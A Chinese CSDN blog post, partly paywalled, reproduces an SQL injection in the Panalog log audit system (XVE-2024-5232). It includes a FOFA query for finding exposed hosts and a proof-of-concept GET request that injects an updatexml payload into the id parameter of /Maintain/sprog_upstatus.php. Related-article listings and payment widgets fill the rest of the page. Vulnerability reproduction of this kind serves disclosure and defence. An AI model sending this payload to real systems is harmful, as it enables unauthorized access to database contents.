Panalog 日志审计系统 sprog_upstatus.php SQL 注入漏洞复现(XVE-2024-5232)

已于 2024-08-03 20:20:54 修改
阅读量21 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-08-03 20:18:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140896075
版权

0x01 产品简介

Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。

0x02 漏洞概述

Panabit /Maintain/sprog_upstatus.php 接口处的 id 参数存在 SQL 注入漏洞,可导致数据库信息泄露从而获取敏感信息,甚至可能被攻击者进一步利用造成更大危害。

0x03 复现环境

FOFA:body="Maintain/cloud_index.php"

0x04 漏洞复现

PoC

GET /Maintain/sprog_upstatus.php?status=1&rdb=1&id=1%20and%20updatexml(1,concat(0x7e,version(),0x7e),1) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-a
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
panabit日志审计系统sprog_upstatus接口处SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-01 131
Panabit日志审计系统接口sprog_upstatus存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息等)。
Panalog 日志审计系统 sprog_deletevent.php SQL 注入漏洞复现
0xSec
12-10 1117
Panabit /Maintain/sprog_deletevent.php 文件的 id 参数存在 SQL 注入漏洞,可导致数据库信息泄露从而获取敏感信息,甚至可能被攻击者进一步利用造成更大危害。
【1day】Panabit 日志系统openid接口SQL注入漏洞
记录并分享学习安全的知识点..
12-05 1107
Panalog是一款日志系统,方便用户统一集中监控、管理在网的海量设备。Panabit 日志系统openid接口存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
HW漏洞威胁情报第七天|HW情报
weixin_43167326的博客
07-31 826
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
HW漏洞威胁情报第八天|HW情报
weixin_43167326的博客
08-01 1068
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
devsap_new.sql
Rambo
05-09 386
USE [DEVSAP_NEW]GO/****** Object:  Table [dbo].[ZT001]    Script Date: 05/09/2014 15:08:11 ******/SET ANSI_NULLS ONGOSET QUOTED_IDENTIFIER ONGOCREATE TABLE [dbo].[ZT001]( [BUKRS] [nvarchar](4) NOT NUL...
VID PID -List of USB ID's(一)
阿Sir问道
02-29 5万+
# # List of USB ID's # # Maintained by Stephen J. Gowdy <linux.usb.ids@gmail.com> # If you have any new entries, please submit them via # http://www.linux-usb.org/usb-ids.html # or send entrie...
【USB】全球USB厂家 USB ID大全。更新时间:2017-07-29
热门推荐
shen_wei的专栏
08-15 7万+
# # List of USB ID's # # Maintained by Stephen J. Gowdy # If you have any new entries, please submit them via # http://www.linux-usb.org/usb-ids.html # or send entries as patches (diff -u old new) i
【USB】全球USB厂家 USB ID大全。更新时间:2018-01-04
shen_wei的专栏
01-31 7万+
# # List of USB ID's # # Maintained by Stephen J. Gowdy # If you have any new entries, please submit them via # http://www.linux-usb.org/usb-ids.html # or send entries as patches (diff -u old new) i
2021-11-14
sprog_kk的博客
11-15 2196
在centos下安装nginx服务器(手动安装) 注:所有的命令均在root用户下执行,如果在普通用户下要在命令前加上sudo 。 1、可以直接用命令下载yum install nginx 但如果提示不能下载的话也可以用以下方法进行手动下载。 2、在centos中输入 wget http://nginx.org/download/nginx-1.21.4.tar.gz (也可以区官网中http://nginx.org/en/download.html找到最新的版本进行下载) 下载完成后进行解压tar -
redaxo_sprog:更换占位符
05-09
幽灵语言附加占位符轻松创建占位符及其替换一种语言可以使用另一种语言的替代(基于语言的语言)应用占位符的创建无需打开或关闭标签即可完成。 例子platzhalter代码中的占位符(类,函数,模板,模块等)的注释位于...
Sprog-开源
07-19
标题中的"Sprog-开源"揭示了我们正在讨论的是一款名为Sprog的开源软件。开源意味着该软件的源代码是公开的,允许用户查看、修改和分发代码,以适应他们的特定需求或贡献改进。这样的软件通常由全球社区的开发者协作...
Wivuu.Sprog:Sprog(丹麦语为“ Language”)字符串解析库
02-04
为C#7+和.NET Core编写的Sprog(丹麦语,“ Language”)跨平台字符串解析库。 用法 解析一个简单的标识符 Parser TakeIdentifier ( string input , out string _id ) => new Parser ( input ) . Skip ( ...
编程sprog-Obligatorisk-Projekt-Opgaver-C-Verden:2020
02-14
编程Sprog-Obligatorisk-Projekt-Opgaver-C-Verden 2020 独立的opgaver som bearbejder forskellige sproglige konstruktioner og algoritmer i C-verdenens sprog。 Opgave 1:Grafer oggrafgennemløb Opgave 2...
xc3sprog-开源
04-27
xc3sprog是一套实用程序,用于在Linux下使用Xilinx并行电缆和其他JTAG适配器对Xilinx FPGA,CPLD和EEPROM进行编程。 最初基于Andrew Rogers(http://www.rogerstech.co.uk/)编写的代码。
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 512
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 489
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 268
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
鸿蒙系统开发【ASN.1密文转换】安全
最新发布
2301_76813281的博客
08-02 311
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1598
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值